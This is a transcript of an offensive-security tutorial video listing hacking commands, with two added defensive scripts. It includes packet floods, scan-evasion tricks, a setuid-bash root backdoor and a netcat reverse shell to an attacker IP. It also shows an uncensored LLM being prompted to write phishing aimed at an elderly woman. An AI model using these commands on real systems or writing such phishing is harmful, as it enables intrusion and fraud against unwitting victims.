Here are the top 60 hacking commands you need to know. I also brought in a few experts, so get your coffee ready. If you want to try these commands right now, I've got a free Kali Linux sandbox in the description. Just click that link and, right here in your browser, boom, hacking environment. Make sure you read the instructions.
You've got two hosts to hack with. Also, all the commands in this video are in the description below. We even created this beautiful top hacking commands cheat sheet.
You gotta have this, the humble ping command. We ping a host to see if it's up, and if it's up, we'll hack it. But right now we're sending a 64-byte packet. What do you say we send something bigger to test firewall capabilities?
We can type in ping -s and specify the size of our packet, testing the capabilities of a firewall, or we can get even crazier. We'll still send our large packet, ping -s 1300, but then we'll use the switch -f to absolutely obliterate this host: flood it with a ton of packets. And actually, before we do that, I want to see this happen.
I'll start another terminal and give you a bonus command here. This tool is called iftop. I'll install it with apt install iftop, and then type in iftop to run it. Now, let's flood.
Oh, look at that. Whew, that's a lot of data. Ctrl+C to stop that. Same for iftop, goodbye.
And actually, let's keep iftop up because we're not done with ping yet. I know you didn't realize there's so much to ping. And this tool is kind of crazy. It's called hping3. We'll install it with apt install hping3.
And we can do fun things like flooding packets on a specific port. For example, port 80. hping3 -S for a TCP packet. -V for verbose mode, gives us more info. --flood to make it rain.
Finally, the host. Here we go. Man, look at that, and we're hitting port 80. Great for testing web servers. We can also use hping3 for a fancy traceroute: hping3 --traceroute -V, and then here's what's cool, we'll do -1 for ICMP packets, and then our host, networkchuck.coffee. But sometimes firewalls block ICMP with traceroute. Removing -1, we can instead do -p 80 and -S, doing traceroute on port 80, which is web traffic, HTTP, using of course TCP. And pick your port, maybe 443, maybe 53, use the DNS port, specifying --udp for UDP traffic. Or with TCP traffic we can add the -A switch, setting the ACK flag.
And then change our base port with --baseport 1337. All amazing options to help us evade firewall rules. Now I bet you thought we were done with ping, but we're not.
You can tunnel TCP packets over ICMP echo reply and request packets. What? Check this out.
It happens with a tool called ptunnel. apt install ptunnel. On the target side, we'll simply run ptunnel. On the attacker side, we'll run ptunnel -p for proxy address, it'll be our target, -lp to specify our local port, we'll do 8000, -da for our destination address, it'll also be our target,
and we'll do -dp for our destination port, and because I'm going to try SSH, I'll do port 22. Ready, set, tunnel. Now to watch this happen in real time, I'm going to show you a new command. tcpdump will help us capture and visualize these packets in real time. We'll use apt install tcpdump to install it. And then we'll run tcpdump -i for interface, and we'll say any, and we're only looking for ICMP traffic, so we'll type in icmp. Now watch this.
I'll launch a new terminal and I'm going to go over this tunnel using ICMP packets. Oh my gosh. Check this out: ssh, and I'll do username networkchuck, that's my username at the other host, at localhost, pointing it right here on this computer, this server. Ready, set, go. Do you see it happening?
Oh my stinkin' gosh. Literally sending SSH traffic over ICMP echo reply and echo request. That's magic.
whoami. ip address. Yep. I'm somewhere else. That's so cool.
And Ctrl+C to close those tunnels on both sides. This is great for evading firewalls that might block that type of traffic. Here's a quick command from TomNomNom.
Nom, nom, nom, nom. I'm TomNomNom. And this is a trick I use all the time.
If you're running a command and you don't know what you want to do with the output yet, pipe it to vim -. That'll open the output of the command in vim, and then you can either manually edit it or you can use :%! to run it back through any command you want. Run it through sort to put things in order, or grep -v to remove lines you don't want. And then as a bonus, if you have a file name under your cursor, hit gf to open that file in a new buffer.
Nmap will scan a network, helping us discover hosts that we can hack. Here's some fun ways to use it. First, make sure you install it: apt install nmap. We can scan an entire network for quick mapping with nmap -sn and then our target network.
Hey, it found 11 hosts. The switch -sV will do service discovery on a target. Works like a charm. Use the -O switch for OS detection.
Whoa, hold up. We tried, but it's blocking ping probes. Let's try -Pn to not do the probe. We'll add that to our command, -Pn, bam. We got it.
It's a Windows PC. We can use the -sL switch to do quick hostname scanning on a network. And Nmap scripts unlock a whole new world. We can scan for vulnerabilities on a host with --script vuln and then our target host or network. We can use the malware script to scan for known malware. With the -A switch, we can scan for pretty much everything.
Take a little coffee break. It'll take a while. This one switch does OS detection, version detection, some default script scanning from Nmap, and the traceroute. That's a lot of info. That's awesome.
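An added example, not from the video: once the -sn sweep has found hosts and -sV has identified services, a practitioner rarely reads the results off the screen. Nmap's grepable output (-oG -) is made to be piped, so here are two small shell functions that pull the live hosts and the open ports out of it. The sample output in sample_grepable is constructed for this example (the host addresses and version strings are made up); the real pipeline is the nmap command shown in each usage comment.

```shell
#!/usr/bin/env bash
# Added example (not from the video): chain the -sn host sweep and the
# -sV service scan by writing grepable output (-oG -) and parsing it,
# so hosts and open ports feed the next step instead of being read by eye.

# Print one IP per line for every host Nmap reported as Up.
# Usage: nmap -sn 10.0.0.0/24 -oG - | live_hosts
live_hosts() {
  awk -F'\t' '/^Host:/ && /Status: Up/ { split($1, h, " "); print h[2] }' | sort -u
}

# Print "ip port/proto service version" for every open port.
# The grepable Ports: field is port/state/proto/owner/service/rpcinfo/version/
# Usage: nmap -sV -Pn 10.0.0.5 -oG - | open_ports
open_ports() {
  awk -F'\t' '
    /^Host:/ && /Ports:/ {
      split($1, h, " "); ip = h[2]
      ports = ""
      for (i = 2; i <= NF; i++) if ($i ~ /^Ports: /) ports = substr($i, 8)
      n = split(ports, p, ", ")
      for (j = 1; j <= n; j++) {
        split(p[j], f, "/")
        if (f[2] == "open") {
          line = ip " " f[1] "/" f[3] " " f[5]
          if (f[7] != "") line = line " " f[7]
          print line
        }
      }
    }'
}

# Constructed sample of what `nmap -sV -Pn -oG -` prints for one host.
# Made up for this example; a Down line is included only to exercise the filter.
sample_grepable() {
  printf '# Nmap 7.94 scan initiated as: nmap -sV -Pn -oG - 10.0.0.5\n'
  printf 'Host: 10.0.0.5 ()\tStatus: Up\n'
  printf 'Host: 10.0.0.7 ()\tStatus: Down\n'
  printf 'Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//nginx 1.18.0/, 443/closed/tcp//https///\tIgnored State: filtered (997)\n'
  printf '# Nmap done -- 1 IP address (1 host up) scanned\n'
}

# Stand-alone demo: swap sample_grepable for the real nmap pipeline above.
sample_grepable | live_hosts
sample_grepable | open_ports
```

Because -oG separates fields with tabs and the Ports: field with ", ", the awk split is reliable even when a version string contains spaces or slashes are empty, which is where a naive grep/cut usually breaks.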
If we use the -f switch, it'll fragment our packets and make it harder for us to be detected while we're scanning. We can also avoid detection by changing our source port using --source-port, which we can use to just say, hey, um, I'm DNS, don't mind me. And if you really want to be tricky with Nmap, you can scan with decoys. Check this out: -D for decoys, and then specify RND:10. What that will do is generate 10 random IP addresses, random decoys that you're scanning from, so they can't find you. We'll put our host in and then bam, scanning from 10 different IP addresses. Now Nmap is cool, but what if you have a lot to scan, like networks upon networks, and you want to scan them fast? That's where masscan comes in. Once installed with apt install masscan, masscan is similar to Nmap. Now we can specify ports to scan for, specify a network, but then we can specify our rate and go super fast, just like that. Or if we have no idea what networks we're dealing with, we can scan everything in the entire 10.x.x.x range. And we'll do a rate of 10,000. Now it is fast, but you still might want to take a coffee break.
Just saying. We'll just Ctrl+C that. We could also use the --randomize-hosts switch to change the order in which we scan our hosts or networks, helping us stay a bit more hidden. Or we can quickly find servers foolishly running Telnet on a network, super insecure, but we can find that out right now simply by specifying port 23 and scanning an entire network. Bam. Got one. Now here's John Hammond with something a bit silly, but I love it though. You normally just enter ls on the command line to list stuff in the current directory.
Well, did you know that there is actually an sl command? Like if you were typing really fast or you accidentally made a mistake, or you had a typo when you meant to type ls and you accidentally typed sl, this is the steam locomotive. And it is a train that is displayed on your computer screen on the command line, on the terminal. And look, you can't get out of this.
You can't type anything. You can't do anything. You just have to wait for the whole train to drive by.
Now, the next fun hacking command that I want to show you is actually part of the /dev piece of the file system. I don't know if you're familiar, but there is a /dev/urandom file. And that is like a device to list out pseudo-random data just coming from your computer, right?
Hey, you have a stream, a constant stream of randomness. And this looks hysterical. It is just gibberish, nonsense, zeros and ones, and all the data up to 255 ASCII characters, printable, non-printable, and it just looks like absolute chaos.
You can Ctrl+C out of this, but sometimes it might break the terminal and you can't actually continue to interact with the shell. So it's something that you might be able to do as a troll, as a meme, right? So what if we actually set an alias for that same ls command? Maybe we could set that to sl if we wanted to run the steam locomotive train again, but we could set that to cat /dev/urandom. And now anytime someone were to actually enter ls on the command line, thinking that they're going to list files, it'll just spit up and go crazy with all that random gibberish and nonsense.
I think that's kind of fun. By the way, John Hammond will show us a real hacking command he loves later in the video. The whois command will tell you a ton of stuff about a domain. Install it with apt install whois.
whois microsoft.com. Fax number, phone number, address. Let's try cia.gov. Redacted.
Should have expected that. WhatWeb will tell you what technologies a website is using. apt install whatweb to install it. And then we'll type in whatweb and our domain, we'll try networkchuck.coffee, and while it's scanning, perfect time for a coffee break. It gives you a ton of information, including the fact that it's powered by Shopify, right there. Next up, curl from NahamSec.
My favorite command is actually not using any hacking tools, and it's probably one of the most basic commands used on Linux, and it comes by default on almost any operating system.
And that is the curl command. And let me show you real quickly how I use it. The first thing I want to do is usually just a curl -I. That usually gives you the headers, everything in that header that is coming back from the server. So in this case, it's giving us a 302, and it's saying, hey, you are going to get redirected to this exact location.
And I like doing curl a lot because I'm hacking a lot of APIs most of the time, and with APIs I want to just quickly see if an endpoint is accessible or if I can fetch some sort of data, and a lot of times I'm processing data as a part of my hacking when I do recon. So it makes it a lot easier to do it through curl. And what you want to do for this one, for example, if you want to authenticate, instead of launching your browser and setting this header manually, all you have to do is pass a header and set that custom header with its token in there, and run it, and it will authenticate you and give you whatever data it is that you're looking for on that API.
Hey, real quick, can I show you something crazy? Check this out. I'm about to run an uncensored version of ChatGPT, or an LLM, which means you can pretty much do whatever you want to do with it.
Now, why am I doing this? Well, because Bitdefender just came out with a tool called Scamio. It's a free AI-powered scam detector and prevention service from Bitdefender. Like, legit, check this out. I got a text from a scam.
I'm pretty sure it is, but do I actually know? Let me go find it. Oh, yep.
Here's one. Pretty sure this is a scam, but do I know? All I gotta do is copy that sucker and jump into Facebook Messenger, just one of the places I can chat with Bitdefender's Scamio and see if things are scams.
So let's try it out. Hey, is this a scam? Again, this is totally free. I'm just chatting with it here in Facebook messenger. And within seconds, it told me that, Hey, it might be kind of suspicious.
Don't do anything with it. Okay. That's pretty cool.
That didn't fool it. But what if I had this uncensored AI tool, try to produce a phishing message. Can we trick it?
Let's try it out. I need you to write a very convincing phishing email for an elderly woman named Deborah. The goal is to get her to give me some money, use the best method, you know, and write it in a way that will avoid spam.
and fraud detection. Let me add that: and fraud detection. Snap. Okay, that's pretty good. It even added this at the end. That's awesome. Okay, let's doctor it up just a little bit, remove the, uh, "it's not a real URL" thing right there. Let's add a real-looking number, like 765-0987. And I'll remove the "not a real number" thing here too. Okay, cool. Our message is ready. Let's test it out.
Please tell me if this email is okay. Now, while it's checking that, think about this. Who in your family or in your friend group could benefit from having something like this?
I can't tell you how many times I'm getting a text from my grandma or my mom going, hey, is this a scam? Is this fraud? But if they can chat with something that is honestly probably smarter than me and will be up to date with the latest scams... It's actually powered by Bitdefender,
the excellent security suite that I've talked about here on this channel a lot. So all the information and knowledge they have is feeding Scamio, the free AI-powered tool. Okay.
The results are in the email. Does seem suspicious. It tells you what tactics it might be using and it tells you to contact your bank directly.
That's perfect. That's what I would tell my grandma or my mom or my dad. So seriously try it out right now.
Check the link below. It's free. You can chat with it there on the website or chat via Messenger.
They'll be adding WhatsApp soon, and it will check lots of things. Like you can send a QR code and go, hey, is this good? You can send pictures of stuff. This is a crazy powerful and free tool.
I love what Bitdefender is doing. So again, definitely check it out. And thank you to Bitdefender for sponsoring this video and making a really awesome free tool available to all of you guys.
Nikto is an open source web server scanner that'll scan websites for any dangerous, bad stuff they might have. To install it, we'll do apt install nikto, and for a basic vulnerability scan, we'll do nikto -h for our host and specify our host, networkchuck.coffee.
Gobuster can be used to find directories and files on a web server. We'll install it with apt install gobuster. To enumerate networkchuck.com, we'll do gobuster, type in dir for directories.
That's the mode we're going to be in. We'll type in -u and specify our domain, networkchuck.com. And we'll use -w to specify our wordlist.
I'll use a default Kali Linux one here. And go. And it's discovering all my directories and files.
Now, because Gobuster is written in Go, it's extremely fast. Subdomain enumeration? Yeah, we can use it for that. But first we want to download a wordlist. To get a ton of wordlists right now on your system, we'll use the tool called SecLists: apt install seclists. Fair warning.
This is pretty big. Lots of wordlists. Once it's done downloading, you can find it in /usr/share/seclists.
Lots of stuff in there. Now real quick, if you only want to download one thing, the thing that we care about, there's a command for that. It's called wget. SecLists is also on GitHub and it's maintained by my friends. What we care about is Discovery, and DNS.
And we'll get Jason Haddix's list here. I'm going to grab the raw URL. To install wget: apt install wget.
Kind of seeing a pattern here, right? Type in wget, paste that URL. wget. Now getting back to Gobuster, we can enumerate domains.
We'll type in gobuster, and it'll be dns. We'll specify our domain with -d, networkchuck.com, and then our wordlist with -w. I'll use Jason Haddix's DNS list. Ready, set, go.
Now that's a pretty big list. And if I were doing a legit pen test, I probably let this finish out, but I don't have time for that. I'm not patient enough.
Ctrl+C to stop that. I want to show you another way to do subdomain enumeration. This tool is called Sublist3r.
You can install it with apt install sublist3r, just like this, and the E is a three. Then to run Sublist3r, we'll simply type in sublist3r -d to specify our domain, networkchuck.com, and let it go. And it found a lot of stuff.
This next one is pretty fun. It's called WPScan. It will scan WordPress sites and help you find all the issues that might be affecting them. Great if you're a WordPress site owner and great if you're a pen tester. Let's try it out.
We can run it in a few ways. First way: wpscan. We'll do --url and specify our URL.
We'll do chuckkeith.com, my personal website that's not doing anything. And then we'll do --enumerate u.
Not you, the letter u. The u stands for users. Let's try it out.
That's a lot of information. We can also use the p option for plugins. We can use t for themes.
Or do something pretty aggressive. We'll do vp, vt, --plugins-detection, and we'll add aggressive at the end, just to make sure we get our point across. This is a super aggressive vulnerability scan.
Let's try it out. You may have noticed that all of those commands did not output anything fun, because you need an API token from WPScan, which you can get for free right now. And then you would run the commands like this, specifying your API token with the --api-token switch.
Amass is another tool you can use for subdomain enumeration. Install it with apt install amass, and to run it, we'll type in amass enum -d to specify our domain, networkchuck.com, and let it go. This tool might run forever.
I don't want to wait for it though. Ctrl+C to stop that. But man, look at all the stuff. To do a more passive enumeration, you can do this: amass enum, and we'll specify -passive and then our domain. Whereas the other one was a bit more active.
I like Amass because it gives us options based on what our scope is. And we'll go ahead and stop that. This next command opens up the door to new commands. What does that mean?
You'll see. It's a tool called Git, which we'll often use when we first start out to interact with GitHub. Let me show you. There's a tool we're about to use called searchsploit. But the way we use this tool is by downloading it from GitHub. And actually, I lied. This is a GitLab repository, but it's pretty much the same thing.
You'll use Git all the time to install all kinds of stuff. But first we have to install Git: apt install git. You probably already have it. And then probably my favorite command is git clone.
We're going to clone a tool onto our computer. And in our case, it will be searchsploit. Let's go.
To properly use that command, we'll add a symbolic link. We're not gonna talk about that, just know it's a command below. And then finally we can use the command searchsploit, right? Yeah, it's gonna work.
Let's try searching for WordPress plugins. It'll search for exploits that involve WordPress plugins. What about SSH? A ton of exploits pertaining to SSH. Super handy tool.
If you want to update the database, searchsploit -u. Crazy powerful tool. Now here's John Hammond with a real hacking command. It's kind of awesome. Let me get into the real, genuine, ethical hacking and penetration testing, my favorite top hacking command.
Here's the thing. When you're on the command line interacting with the shell, you're actually running this program called Bash, or the Bourne-again shell. Now, that lives on the file system in /bin/bash. So if I were to actually execute this, it doesn't look like it does anything.
I just get the prompt back, because I've just invoked and I'm running a shell or terminal inside my shell. So I could exit out of that and get back to my original prompt. But /bin/bash actually takes a special argument called -p. And that will enforce and maintain setuid permissions, which means that the owner of the file, root in this case, the admin, absolute controller of the computer, will be able to keep their permissions, but it has to be a setuid binary. So the way that we could do that
is actually chmod, change mode or change modifications on the file, and add, or plus, the s letter for setuid. We'll put that on /bin/bash, and this will require some root privileges. That means that you need to be the admin to be able to configure this. But what that ultimately does is create a backdoor where you have a persistence mechanism, a little bit of a foothold, so that at any point, if we configure this with our sudo password, later on down the line you get access to this machine one more time. Now you can just run bash -p and you are root. You control the whole machine because you are the admin user. You set up that backdoor. If you wanted to, you could move into the root directory and you could do anything that you want.
Maybe we could echo hello into a file called "please subscribe to network chuck". I'll hit enter on that, and now if I zoom out, let me show you this, ls -la, we can see our file right there, please subscribe to network chuck, hey, just owned and controlled by the root user. And we were able to configure that with our backdoor, sudo chmod +s /bin/bash. That is my favorite top hacking command, because then you've got a backdoor. You've got a persistence mechanism and a way to become root at any point.
I hope you enjoyed a couple of those really neat, hey, top hacking commands, but thank you so much, Network Chuck, for letting me join the party here. This was an absolute blast. Now I'm going to do something bad.
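An added example, not from the video or from John: the defender's side of the chmod +s /bin/bash backdoor he just set up. A setuid-root shell or interpreter is a standing root escalation, since bash -p keeps the effective uid, so the check is simply to list setuid files and flag the names that should never carry that bit. The list of suspicious names in SUSPICIOUS_SUID_RE is this example's own choice, not a complete inventory.

```shell
#!/usr/bin/env bash
# Added example (not from the video): find the backdoor that
# `sudo chmod +s /bin/bash` leaves behind, or any other setuid
# shell/interpreter that would hand out root the same way.

# All regular files with the setuid bit set under the given roots.
# -xdev keeps find on one filesystem; unreadable directories are ignored.
find_suid() {
  find "$@" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Basenames that should never be setuid: shells, interpreters and a few
# helpers that can spawn a shell. Illustrative list, extend for your estate.
SUSPICIOUS_SUID_RE='(^|/)((ba|da|z|k|tc|c)?sh|python[0-9.]*|perl|ruby|find|vim|nano|less|more|env|cp|mv)$'

# Print the suspicious setuid files under the given roots.
# Returns 1 if any were found (so a cron job or CI step can fail on it), 0 otherwise.
flag_suid_shells() {
  local hits
  hits=$(find_suid "$@" | grep -E "$SUSPICIOUS_SUID_RE") || true
  [ -z "$hits" ] && return 0
  printf '%s\n' "$hits" | sed 's/^/SUSPICIOUS setuid: /'
  return 1
}

# Stand-alone run over the usual binary directories.
flag_suid_shells /bin /usr/bin /usr/local/bin /sbin /usr/sbin && echo "no setuid shells found"
```

Run it as root to see every filesystem; as an unprivileged user the result is still useful, because the backdoored binary has to be readable and executable by you for the attack to work at all. A legitimate setuid program such as passwd or sudo is not flagged; the point is the names, not the bit.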
I want to do the same command twice. What? No, I know, it's okay. We're going to talk about tcpdump again.
Why? Well, because there's more cool stuff about it and we didn't give it enough time. We'll type in tcpdump.
We'll type in -w to send it to a file. We'll just call it capture.pcap, then -i for our interface, and we'll do eth0. That's the one I have now. Let me just make sure that's the case: ip address.
Yes. eth0, and go. Now we'll generate some traffic.
Do something fun that we've already learned: nmap with random addresses, decoys. We'll stop that with Ctrl+C. We can analyze that traffic with this command: tcpdump -r.
Specify our capture file, which is just capture.pcap. Let's take a look. Cool, we can see it. We can also limit the amount of packets we capture.
tcpdump and the switch -c for count, and we'll say like 100. That did not take long. Now tcpdump is pretty cool, great for quick captures, but the real tool you want to use, that's crazy powerful, is Tshark, the command-line brother of Wireshark. To install Tshark, we'll do apt install tshark. Tshark can do a lot.
Let's try a few things. First, we'll type in tshark and we'll capture one packet. Just one.
We'll put it in verbose mode with -V. We'll do -c for count, we'll do one, and then -i eth0. One packet captured.
And then look at all the stuff it shows us. That is so powerful. Networking geeks are just drooling.
So yes, I'm drooling. Do you want to see something crazier? Filters.
Watch this. tshark. We'll do a -Y to apply a display filter.
With a single quote, we'll specify it. We'll do http.request.method, space, ==, and a double-quoted GET. And then close it out with a single quote: 'http.request.method == "GET"'. I know it's kind of wordy, but check this out.
Let's specify our interface, eth0. And we're now capturing and only showing GET requests.
How cool is that? Let's generate some: curl academy.networkchuck.com. There's another one.
That's so cool. Now one of the most powerful ways we can use Tshark is by analyzing packet captures. So let's do a capture real quick to a file, tshark, and actually no, I'm gonna show you one cool thing.
We'll use a command called timeout and put in 15 seconds, and it will time out or stop this packet capture in 15 seconds. It's pretty cool. tshark -i eth0, and with the -w switch, similar to tcpdump, we'll send that to a file,
tshark.pcap. Let me try to generate some quick traffic. And done. To display statistics, and specifically to follow endpoint connections, use this command: tshark -r. We'll specify our capture, which was tshark.pcap.
Then we'll use the switches -qz and specify endpoints,ip. How cool is that? We can also follow a TCP stream with tshark -r, our capture, -qz, and we'll say follow,
tcp, and we'll put that in ASCII, so ascii, we'll do comma, and we'll follow the seventh stream. That's pretty cool. Let's try, I don't know, the first stream.
First stream's crazy. Let's do the 20th stream. 100th stream. So powerful.
We could also simply do custom output of fields based on the capture we're reviewing. Check this out. tshark, do a -e ip.src.
-e ip.dst. -e frame.protocols. Notice we're specifying fields.
We'll do a -T fields, which is telling it to only output the fields we're specifying. And then finally -r, specifying our capture.
How cool is that? So powerful. This is my new favorite tool, tmux, a terminal multiplexer.
Install tmux with apt install tmux. And then simply type in tmux. We suddenly have a new terminal that we can do stuff in, like pinging academy.networkchuck.com. Leave that there, hit Ctrl+B and then D on your keyboard. You're detached from it, and then with tmux a, get right back to it.
How powerful is that? I'll stop this, type in exit to close that out. We can create multiple sessions and name them.
So tmux new -s and name it bob. Here's bob, we'll ping something here. Detach from that, create another session, suzy.
And now if I type in tmux ls, I've got two sessions and I can reattach to either of them. tmux a -t to specify my target, we'll say suzy. Jumping right back in there.
I can hit Ctrl+B and then W to quickly jump between my various tmux sessions. And I can leave, go to another computer, jump back in here, and connect to any one of these sessions. If you wanna learn more, I did a whole video on tmux right up here.
SSH, we use it all the time to remote into our systems. So for example, this Ubuntu guy. To jump into him, I'll use SSH.
ssh networkchuck@ his IP address. Already cool, but it can do more. Instead of logging in, I can actually just run a command via SSH on another system, with ssh networkchuck@ my server, and then right after that, specify the command I want to run.
So in single quotes, I can say whoami. Bam. Or ip address. Crazy powerful. Let's get crazier.
You can actually make it a SOCKS proxy. What? Watch this. Before I create the tunnel, let me demonstrate my location right now.
What's my IP address? I'm in Dallas, Texas, as you can see right here. But if I use this crazy SSH command, I'll create a proxy and tunnel myself somewhere else. ssh -D, which is telling it to create a SOCKS proxy, and I'll say port 1337. We'll do -C for compression, -q for quiet mode, and -N to not execute any commands. And finally our server information: root@ and this will be a server in Japan. Put our password in. Now we're gonna launch Chromium using that proxy, SOCKS5, localhost. Ready, set, go. Chromium's launched. Now let's see where we are. Already feel a bit different. And given that I'm having a hard time figuring out where to go, I'm definitely in Osaka, Japan. Super cool, right?
Netcat, our go-to for reverse shells. To install Netcat, we'll do apt install netcat-traditional. To verify, just type in nc -h. With Netcat installed on both your attacking computer and your target computer, let's do a reverse shell. On the attacker, all we gotta do is wait. Wait for the shell. Type in nc -lvp and the port you're waiting on, 1337. We're waiting, because on a reverse shell, the target reaches out to us. On the target side, I will type in nc for Netcat. We'll do a -e and specify the shell we wanna have access to, so we'll do /bin/sh, specify our attacker IP, which is us, and the port, 1337, that the attacker is listening on. And then we'll hit enter, and something happened? It sure stinking did, check it out. I'm on the other computer. I've got a reverse shell.
Now you can also do a fun thing where you just set up a simple chat server with Netcat. Why? I don't know, but you can do it. You should try it. It's fun. On one side you type in nc -lvp, set a port. On the other side, type in nc -v, the IP address of the other computer, and the port. So now I can say hey, and I get hey on the other side. What are you thinking about? The end of this video. Me too. I'll catch you guys next time. For real though. Bye.